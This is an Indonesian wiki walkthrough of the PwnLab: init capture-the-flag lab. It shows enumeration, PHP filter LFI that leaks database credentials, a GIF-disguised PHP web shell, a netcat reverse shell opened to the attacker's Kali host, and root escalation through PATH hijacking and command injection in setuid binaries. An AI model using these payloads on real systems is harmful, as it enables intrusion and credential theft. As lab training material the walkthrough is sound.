Difference between revisions of "CTF PwnLab: init: Walkthrough"
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| Line 520: | Line 520: | ||
nc -nvlp 4444 | nc -nvlp 4444 | ||
| − | |||
Browse untuk connect ke port | Browse untuk connect ke port | ||
| Line 537: | Line 536: | ||
www-data | www-data | ||
python -c 'import pty; pty.spawn("/bin/bash");' | python -c 'import pty; pty.spawn("/bin/bash");' | ||
| − | www-data@pwnlab:/var/www/html$ | + | www-data@pwnlab:/var/www/html$ |
| − | |||
==Privilege Escalation== | ==Privilege Escalation== | ||
Revision as of 08:38, 24 January 2023
Objective / Goal
- masuk ke sistem
- dapat root
Download & Masukan ke VirtualBox
https://www.vulnhub.com/entry/pwnlab-init,158/#download https://download.vulnhub.com/pwnlab/pwnlab_init.ova
Import pwnlab_init.ova ke VirtualBox
- Load VirtualBox
- Import
Kali Linux
Cek IP address VM
sudo su netdiscover -r 192.168.0.0/24
Hasilnya kira-kira
Currently scanning: Finished! | Screen View: Unique Hosts
29 Captured ARP Req/Rep packets, from 20 hosts. Total size: 1740
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.0.2 40:16:7e:22:e7:69 1 60 ASUSTek COMPUTER INC.
192.168.0.4 10:6f:3f:3d:73:d0 1 60 BUFFALO.INC
192.168.0.7 4c:e6:76:1f:15:4b 1 60 BUFFALO.INC
192.168.0.9 10:6f:3f:17:94:94 1 60 BUFFALO.INC
192.168.0.7 4c:e6:76:1f:15:4c 1 60 BUFFALO.INC
192.168.0.60 74:d0:2b:6a:a9:66 1 60 ASUSTek COMPUTER INC.
192.168.0.101 08:60:6e:db:4e:b8 1 60 ASUSTek COMPUTER INC.
192.168.0.130 08:00:27:93:a2:1b 1 60 PCS Systemtechnik GmbH
192.168.0.141 b0:a7:b9:b6:c1:c9 2 120 TP-Link Corporation Limited
192.168.0.145 c0:56:27:1c:be:e1 1 60 Belkin International Inc.
192.168.0.169 4c:e6:76:1f:15:4b 1 60 BUFFALO.INC
192.168.0.170 4c:e6:76:1f:15:4b 1 60 BUFFALO.INC
192.168.0.169 4c:e6:76:1f:15:4c 4 240 BUFFALO.INC
192.168.0.170 4c:e6:76:1f:15:4c 1 60 BUFFALO.INC
192.168.0.199 b4:b0:24:3d:8b:3b 1 60 TP-Link Corporation Limited
192.168.0.102 6c:29:90:1e:89:7f 1 60 WiZ Connected Lighting Company Limited
192.168.0.223 c0:56:27:67:0d:a3 1 60 Belkin International Inc.
192.168.0.222 6c:16:32:63:52:21 3 180 HUAWEI TECHNOLOGIES CO.,LTD
192.168.0.224 28:ff:3e:5c:10:32 4 240 zte corporation
192.168.0.194 52:aa:ba:2c:0b:15 1 60 Unknown vendor
MAC address yang mencurigakan adalah 08:00:..... IP address target: 192.168.1.130.
Enumeration target
Gunakan nmap -v -A ke IP address sasaran,
nmap -v -A 192.168.0.130
Hasilnya kira-kira,
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-22 03:45 EST NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 03:45 Completed NSE at 03:45, 0.00s elapsed Initiating NSE at 03:45 Completed NSE at 03:45, 0.00s elapsed Initiating NSE at 03:45 Completed NSE at 03:45, 0.00s elapsed Initiating ARP Ping Scan at 03:45 Scanning 192.168.0.130 [1 port] Completed ARP Ping Scan at 03:45, 0.07s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 03:45 Completed Parallel DNS resolution of 1 host. at 03:45, 0.00s elapsed Initiating SYN Stealth Scan at 03:45 Scanning 192.168.0.130 [1000 ports] Discovered open port 111/tcp on 192.168.0.130 Discovered open port 3306/tcp on 192.168.0.130 Discovered open port 80/tcp on 192.168.0.130 Completed SYN Stealth Scan at 03:45, 0.11s elapsed (1000 total ports) Initiating Service scan at 03:45 Scanning 3 services on 192.168.0.130 Completed Service scan at 03:45, 6.05s elapsed (3 services on 1 host) Initiating OS detection (try #1) against 192.168.0.130 NSE: Script scanning 192.168.0.130. Initiating NSE at 03:45 Completed NSE at 03:45, 0.19s elapsed Initiating NSE at 03:45 Completed NSE at 03:45, 0.03s elapsed Initiating NSE at 03:45 Completed NSE at 03:45, 0.00s elapsed Nmap scan report for 192.168.0.130 Host is up (0.00057s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-title: PwnLab Intranet Image Hosting | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.10 (Debian) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 36677/udp6 status | 100024 1 38362/tcp6 status | 100024 1 47606/udp status |_ 100024 1 48220/tcp status 3306/tcp open mysql MySQL 5.5.47-0+deb8u1 | mysql-info: | Protocol: 10 | Version: 5.5.47-0+deb8u1 | Thread ID: 38 | Capabilities flags: 63487 | Some Capabilities: Support41Auth, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, SupportsLoadDataLocal, InteractiveClient, IgnoreSigpipes, LongPassword, ConnectWithDatabase, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, SupportsTransactions, FoundRows, SupportsCompression, LongColumnFlag, ODBCClient, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults | Status: Autocommit | Salt: -G^"+S@(D]'IzNT:dlpn |_ Auth Plugin Name: mysql_native_password MAC Address: 08:00:27:93:A2:1B (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Uptime guess: 0.016 days (since Sun Jan 22 03:22:46 2023) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=258 (Good luck!) IP ID Sequence Generation: All zeros TRACEROUTE HOP RTT ADDRESS 1 0.57 ms 192.168.0.130 NSE: Script Post-scanning. Initiating NSE at 03:45 Completed NSE at 03:45, 0.00s elapsed Initiating NSE at 03:45 Completed NSE at 03:45, 0.00s elapsed Initiating NSE at 03:45 Completed NSE at 03:45, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.08 seconds Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)
Alternatif lain menggunakan onetwopunch.sh script yang bisa di ambil di
https://github.com/superkojiman/onetwopunch/blob/master/onetwopunch.sh
Caranya,
onetwopunch.sh -t targets -p all -n "-sV -O --version-intensity=9"
Dari hasil nmap, terlihat dengan jelas beberapa hal yang menarik dari sasaran,
- Ada Web Server
- Ada Database Server
Investigasi HTTP requests/responds
Untuk investigasi HTTP requests/responses
Tools: Burp Suite, Fiddler, Tamper Data/Cookies Manager+ (FF addons) Scan vulnerability (outdated version, LFI/RFI, SQLi, …) Tools: Nikto, sqlmap, nmap scripts Mencari hidden/misconfigured directori atau file Tools: Dirbuster, GoBuster, Nikto
atau
Jalankan nikto,
nikto -host 192.168.0.130
Hasilnya,
- Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.0.130 + Target Hostname: 192.168.0.130 + Target Port: 80 + Start Time: 2023-01-22 04:01:12 (GMT-5) --------------------------------------------------------------------------- + Server: Apache/2.4.10 (Debian) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1". + Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Cookie PHPSESSID created without the httponly flag + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /config.php: PHP Config file may contain database IDs and passwords. + OSVDB-3268: /images/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + /login.php: Admin login page/section found. + 7915 requests: 0 error(s) and 11 item(s) reported on remote host + End Time: 2023-01-22 04:02:08 (GMT-5) (56 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Disini yang menarik, kita menemukan,
- config.php kemungkinan ada username/password untuk akses database.
- login form, yang perlu di investigasi lebih lanjut, contoh
http://192.168.0.130/?page=login. Possibly vulnerable to LFI.
kemungkinan vulnerable untuk LFI (Local Inclusion File).
Bruteforcing MySQL
Percobaan untuk bruteforcing MySQL secara manual,
mysql -h 192.168.0.130 -u root -p Enter password: (kosong) ERROR 1045 (28000): Access denied for user 'root'@'192.168.0.62' (using password: NO)
mysql -h 192.168.0.130 -u root -p Enter password: (root) ERROR 1045 (28000): Access denied for user 'root'@'192.168.0.62' (using password: YES)
Naga-naga-nya kita tidak bisa menembus secara manual.
Cek Web
Login Page
Login Page
http://192.168.0.130/login.php
Coba menggunakan SQL Injection attack,
sqlmap -u "http://192.168.0.130/?page=login" --data="user=abcd&pass=abcd&submit=Login" --level=5 --risk=3 --dbms=mysql
hasilnya ..
..... [04:51:46] [WARNING] parameter 'Host' does not seem to be injectable [04:51:46] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent' [04:51:46] [WARNING] your sqlmap version is outdated [*] ending @ 04:51:46 /2023-01-22/
Usaha sql injection gagal, kita coba vulnerable to LFI.
LFI vulnerability
Local File Inclusion (LFI) vulnerability yang sering ditemukan dalam aplikasi web yang ditulis dengan buruk. Kerentanan ini terjadi ketika aplikasi web memungkinkan pengguna mengirimkan input ke dalam file atau mengunggah file ke server. Silahkan baca2 https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/
Contoh LFI code:
<?php
if (isset($_GET['page']))
{
include($_GET['page'] . '.php');
}
?>
Kita coba URL di bawah (gagal total),
http://192.168.0.130/?page=/etc/passwd http://192.168.0.130/?page=/etc/passwd http://192.168.0.130/?page=../../../../../../../etc/passwd http://192.168.0.130/?page=../../../../../../../etc/passwd
Gunakan PHP filter untuk meng-encode .php file content ke base64 string sehingga kita bisa mem-bypass server agak tidak meng-eksekusi file .php yang kita ambil. Tampaknya teknik ini berhasil,
http://192.168.0.130/?page=php://filter/convert.base64-encode/resource=config
Kita bisa dapat config.php:
<?php $server = "localhost"; $username = "root"; $password = "H4u%QJ_H99"; $database = "Users"; ?>
Keren! kita dapat username password MySQL.
Mari kita lanjutkan analisa menggunakan PHP filter,
http://192.168.0.130/?page=php://filter/convert.base64-encode/resource=index
Kita dapat index.php:
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head> <title>PwnLab Intranet Image Hosting</title> </head> <body>
< img src="images/pwnlab.png">< br />
[ < a href="/">Home</a> ][ < a href="?page=login">Login</a> ][ < a href="? page=upload">Upload</a> ]
< hr />< br />
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</body> </html>
Lines 4-6: LFI vulnerability, jika kita set sebuah cookie dengan name _lang _ pointing ke sebuah file di file sistem, maka file tersebut akan di include. Kita bahkan tidak perlu pening menambahkan .php di belakangnya! Lines 20-23: LFI vulnerability kita dapat source codenya terima kasih banyak.
http://192.168.0.130/?page=php://filter/convert.base64-encode/resource=upload
Upload.php
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action= method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
if ($_FILES['file']['error'] <= 0) {
$filename = $_FILES['file']['name'];
$filetype = $_FILES['file']['type'];
$uploaddir = 'upload/';
$file_ext = strrchr($filename, '.');
$imageinfo = getimagesize($_FILES['file']['tmp_name']);
$whitelist = array(".jpg",".jpeg",".gif",".png");
if (!(in_array($file_ext, $whitelist))) {
die('Not allowed extension, please upload images only.');
}
if(strpos($filetype,'image') === false) {
die('Error 001');
}
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
die('Error 002');
}
if(substr_count($filetype, '/')>1){
die('Error 003');
}
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "<img src=\"".$uploadfile."\">
";
} else {
die('Error 4');
}
}
}
?>
Sampai titik ini kita mengexploit page yang kita lihat di atas. Tapi tampaknya banyak hal yang menarik di page tersebut.
Lines 2-3: Ini yang tampaknya men-deny waktu kita akses. Lines 16-49: Banyak kondisi untuk upload sebuah file:
Err 0: Whitelist untuk file dengan ending .jpg, ,jpeg, .gif dan .png Err 1: File is not identified as an image Err 2: HEX signature validation? Err 3: File name contains ‘/’ to avoid LFI Err 4: Failed to upload file
Akses MySQL
Selanjutnya kita akan melihat kemungkinan untuk upload backdoor. Kita perlu mengakses page ini. Mari kita coba akses database MySQL menggunakan username password yang kita temukan di config.php.
mysql -h 192.168.0.130 -u root -p Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 21180 Server version: 5.5.47-0+deb8u1 (Debian) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [(none)]> MySQL [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | Users | +--------------------+ 2 rows in set (0.001 sec)
MySQL [(none)]> MySQL [(none)]> use Users; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MySQL [Users]>
MySQL [Users]> MySQL [Users]> show tables; +-----------------+ | Tables_in_Users | +-----------------+ | users | +-----------------+ 1 row in set (0.001 sec) MySQL [Users]>
MySQL [Users]> MySQL [Users]> select * from users; +------+------------------+ | user | pass | +------+------------------+ | kent | Sld6WHVCSkpOeQ== | | mike | U0lmZHNURW42SQ== | | kane | aVN2NVltMkdSbw== | +------+------------------+ 3 rows in set (0.001 sec) MySQL [Users]>
Password tampaknya base64, jika kita decode misalnya via https://www.base64decode.org/, kita akan dapat,
kent: JWzXuBJJNy mike: SIfdsTEn6I kane: iSv5Ym2GRo
Uploading backdoor
Menggunakan salah satu username password yang tersedia memungkinkan kita untuk mengakses halaman upload. Yang ingin kita lakukan sekarang adalah menemukan cara untuk mendapatkan shell.
Bagaimana dengan mengunggah GIF yang berisi kode PHP, dan memasukkannya ke dalam kerentanan LFI yang kami temukan sebelumnya (cookie lang)?
Buat fake PNG file berisi PHP code
Buat fake png file berisi PHP code,
GIF89; <?php system($_GET["cmd"]) ?>
GIF89 digunakan untuk mem-bypass type check, informasi lebih lanjut bisa di baca2 di https://en.wikipedia.org/wiki/List_of_file_signatures .
Lakukan,
- Login ke pwnlab menggunakan
kent: JWzXuBJJNy mike: SIfdsTEn6I kane: iSv5Ym2GRo
- Upload ke menu upload http://192.168.0.130/?page=upload
File PNG biasanya di simpan dalam md5 hash. Ini bisa dilihat menggunakan CRTL-U dari browser, terlihat md5 hash dari file png yang kita gunakan,
../upload/d1a17e1e32f2bfa1b90a6754cadd1df8.png
Set lang cookie agar memasukan image yang kita upload
Jika menggunakan chrome, bisa masuk ke Developer Tools (Ctrl-Shift-J atau Tools -> Developer Tools) -> Console dan masukan javascript command:
document.cookie="keyofcookie=valueofcookie"
Kita dapat mengganti / menambahkan new cookie menggunakan teknik ini. Kita juga dapat memasukan multiple cooke seperti,
document.cookie="username=John Doe; expires=Thu, 18 Dec 2013 12:00:00 UTC; path=/";
Dari browser CTRL-SHIFT-J masukan cookies,
document.cookie="lang=../upload/d1a17e1e32f2bfa1b90a6754cadd1df8.png";
Start netcat listener di Kali
Start 4444 listener
nc -nvlp 4444
Browse untuk connect ke port
- cek IP address kali linux dengan perintah "ifconfig eth0", misalnya hasilnya 192.168.0.94
- Browse ke URL (perhatikan spasi)
http://192.168.0.130/?cmd=nc -nv 192.168.0.94 4444 -e /bin/bash
Di kali linux CLI akan ada kata2,
# nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.0.94] from (UNKNOWN) [192.168.0.130] 56439
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash");'
www-data@pwnlab:/var/www/html$
Privilege Escalation
coba user kent
Dari shell, Lakukan su ke user kent
cd /home ls www-data@pwnlab:/home$
ww-data@pwnlab:/home$ ls -al ls -al total 24 drwxr-xr-x 6 root root 4096 Mar 17 2016 . drwxr-xr-x 21 root root 4096 Mar 17 2016 .. drwxr-x--- 2 john john 4096 Mar 17 2016 john drwxr-x--- 2 kane kane 4096 Mar 17 2016 kane drwxr-x--- 2 kent kent 4096 Mar 17 2016 kent drwxr-x--- 2 mike mike 4096 Mar 17 2016 mike www-data@pwnlab:/home$
Lalukan su ke user kent
www-data@pwnlab:/home$ su kent su kent Password: JWzXuBJJNy kent@pwnlab:/home$ cd kent cd kent kent@pwnlab:~$ ls -al ls -al total 20 drwxr-x--- 2 kent kent 4096 Mar 17 2016 . drwxr-xr-x 6 root root 4096 Mar 17 2016 .. -rw-r--r-- 1 kent kent 220 Mar 17 2016 .bash_logout -rw-r--r-- 1 kent kent 3515 Mar 17 2016 .bashrc -rw-r--r-- 1 kent kent 675 Mar 17 2016 .profile kent@pwnlab:~$
kent@pwnlab:~$ find / -user kent 2>/dev/null find / -user kent 2>/dev/null ......... /home/kent /home/kent/.bashrc /home/kent/.profile /home/kent/.bash_logout
coba sudo -l
kent@pwnlab:~$ sudo -l sudo -l bash: sudo: command not found
kent tidak bisa sudo :( ..
exit
coba user kane
www-data@pwnlab:/home$ su kane su kane Password: iSv5Ym2GRo kane@pwnlab:/home$ cd kane
kane@pwnlab:~$ ls -al ls -al total 28 drwxr-x--- 2 kane kane 4096 Mar 17 2016 . drwxr-xr-x 6 root root 4096 Mar 17 2016 .. -rw-r--r-- 1 kane kane 220 Mar 17 2016 .bash_logout -rw-r--r-- 1 kane kane 3515 Mar 17 2016 .bashrc **-rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike** -rw-r--r-- 1 kane kane 675 Mar 17 2016 .profile
kane@pwnlab:~$ file msgmike file msgmike msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped kane@pwnlab:~$ ./msgmike ./msgmike
- cat: /home/mike/msg.txt: No such file or directory**
kane@pwnlab:~$ strings msgmike ...
- cat /home/mike/msg.txt**
... kane@pwnlab:~$ Are you thinking what I’m thinking? msgmike might be doing the following code:
int main() {
system("cat /home/mike/msg.txt");
} This is very poorly configured as cat command is found by searching for files with that specific name in the PATH environment variable. If we create a script called cat in a certain directory and override the PATH variable, we might be able to get a shell for use mike!
If you’re interested in such problems, check out root-me.org’s system problems!
kane@pwnlab:~$ echo "/bin/bash" > cat echo "/bin/bash #" > cat kane@pwnlab:~$ chmod 777 cat chmod 777 cat kane@pwnlab:~$ export PATH=/home/kane export PATH=/home/kane kane@pwnlab:~$ ./msgmike ./msgmike bash: dircolors: command not found bash: ls: command not found mike@pwnlab:~$ 4. Running as mike and becoming god root You’ll need to reset the PATH variable first.
mike@pwnlab:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin mike@pwnlab:~$ cd ../mike cd ../mike mike@pwnlab:/home/mike$ ls -al ls -al total 28 drwxr-x--- 2 mike mike 4096 Mar 17 2016 . drwxr-xr-x 6 root root 4096 Mar 17 2016 .. -rw-r--r-- 1 mike mike 220 Mar 17 2016 .bash_logout -rw-r--r-- 1 mike mike 3515 Mar 17 2016 .bashrc -rwsr-sr-x 1 root root 5364 Mar 17 2016 msg2root -rw-r--r-- 1 mike mike 675 Mar 17 2016 .profile mike@pwnlab:/home/mike$ ./msg2root ./msg2root Message for root: wanna hook? wanna hook? wanna hook? mike@pwnlab:/home/mike$ strings msg2root strings msg2root ... Message for root: /bin/echo %s >> /root/messages.txt ... mike@pwnlab:/home/mike$ Hmm… msg2root possibly looks like this (might not compile, don’t complain!):
- include <iostream>
char msg[1024]; //Let's assume no BO takes place, alrighty? char command[1024];
int main() {
printf("Message for root: ");
scanf("%s", msg);
snprintf(command, sizeof(command), "/bin/echo %s >> /root/messages.txt", msg);
system(command);
} Let’s find a way in.
mike@pwnlab:/home/mike$ ./msg2root ./msg2root Message for root: **opensesame; bash -p** **//-p to preserve current privileges** opensesame; bash -p opensesame bash-4.3# whoami whoami root bash-4.3# cd /root cd /root bash-4.3# ls -al ls -al total 20 drwx------ 2 root root 4096 Mar 17 2016 . drwxr-xr-x 21 root root 4096 Mar 17 2016 .. lrwxrwxrwx 1 root root 9 Mar 17 2016 .bash_history -> /dev/null -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
1 root root 1840 Mar 17 2016 flag.txt
lrwxrwxrwx 1 root root 9 Mar 17 2016 messages.txt -> /dev/null lrwxrwxrwx 1 root root 9 Mar 17 2016 .mysql_history -> /dev/null -rw-r--r-- 1 root root 140 Nov 19 2007 .profile bash-4.3# cat flag.txt cat flag.txt
.-=~=-. .-=~=-. (__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _) (_ ___) _____ _ (_ ___) (__ _) / __ \ | | (__ _) ( _ __) | / \/ ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __) (__ _) | | / _ \| '_ \ / _` | '__/ _` | __/ __| (__ _) (_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \ (_ ___) (__ _) \____/\___/|_| |_|\__, |_| \__,_|\__|___/ (__ _) ( _ __) __/ | ( _ __) (__ _) |___/ (__ _) (__ _) (__ _) (_ ___) If you are reading this, means that you have break 'init' (_ ___) ( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __) (__ _) this challenge. (__ _) (_ ___) (_ ___) ( _ __) Please send me your feedback or your writeup, I will love ( _ __) (__ _) reading it (__ _) (__ _) (__ _) (__ _) For sniferl4bs.com (__ _) ( _ __) claor@PwnLab.net - @Chronicoder ( _ __) (__ _) (__ _) (_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___) `-._.-' `-._.-'
bash-4.3# That was fun! Thanks for reading!